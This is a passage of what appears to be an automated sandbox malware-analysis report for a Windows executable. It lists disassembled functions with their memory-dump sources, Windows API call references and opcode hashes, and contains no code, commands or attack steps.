                                                                                                                                                                                                                                                                                      Function 0041B0B0 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                      • Instruction ID: 0d88d1c80d5cf604edfe207e3e975c6923d32c25b21c0e4bf53f94e4bddbbc5c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55E18DB1B06A56ABC30A9F79C4805E5F7A5FF4A309B04832EE86C53242D7347467CBC6
                                                                                                                                                                                                                                                                                      Function 0041C450 Relevance: .3, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                      • Instruction ID: 4cfa1d93c302992564cd6e5d5855d4dbd855d3a9678cd46773ae9a1c723c4c6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AD1F975A253118BDB02DFB8C8C05D577A6AF96341B08C37EEC487F20BE738A4428B56
                                                                                                                                                                                                                                                                                      Function 0041CF70 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                      • Instruction ID: eb1f8b5bbe8e890cce5985e8088739ae93b1079bd2bcff990eab828ac5c7b9b1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A431C330D740B049C7809F39C8949E77BE2DB8B206FAD86A7D5D147583D319C64BEB25
                                                                                                                                                                                                                                                                                      Function 00401170 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                      • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                                                      Function 00401190 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                      • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                                                      Function 0040D250 Relevance: 77.0, APIs: 51, Instructions: 450memorystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Free$Alloc$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2961803143-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                      • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                                      Function 00412E50 Relevance: 65.2, APIs: 26, Strings: 11, Instructions: 424stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00412EC4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
